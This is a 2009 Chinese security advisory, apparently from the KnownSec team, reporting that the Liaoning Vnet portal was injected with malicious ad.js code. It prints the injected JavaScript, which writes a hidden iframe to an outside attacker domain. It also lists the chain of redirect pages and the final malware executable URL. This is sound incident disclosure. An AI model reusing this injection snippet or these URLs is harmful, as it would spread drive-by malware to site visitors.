发布时间:Sun May 24 2009 22:20:57 UTC+0800
最后更新时间:Sun May 24 2009 22:20:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 辽宁互联星空(http://ln.vnet.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:http://ln.vnet.cn/ad.js
网页被嵌入恶意链接代码:
var cookieString=document.cookie;
var start=cookieString.indexOf(”cookiesleep”);
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”cookiesleep=test;expires=”+expires.toGMTString();
document.write(”<iframe src=http://zwwderff.cn/08/0008.htm?22 width=100 height=0 border=0></iframe>”);}
挂马分析:
[wide]http://ln.vnet.cn/ad.js
[frame]http://zwwderff.cn/08/0008.htm?22
[frame]http://zwwderff.cn/08/index.html
[frame]http://zwwderff.cn/08/ytqm.htm
[script]http://zwwderff.cn/08/js.js
[frame]http://zwwderff.cn/08/yt14.htm
[frame]http://zwwderff.cn/08/ytfl.htm
[frame]http://zwwderff.cn/08/ytff.htm
[frame]http://zwwderff.cn/08/ytvod.htm
[frame]http://zwwderff.cn/08/ytxxz.htm
[frame]http://zwwderff.cn/08/ytlb.htm
[frame]http://zwwderff.cn/08/yt122121.htm
[script]http://js.tongji.cn.yahoo.com/1116244/ystat.js
最终下载病毒文件:
http://qscdfdda.cn/8.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
知道创宇:专业的WEB安全公司 www.knownsec.com
Popularity: 4% [?]
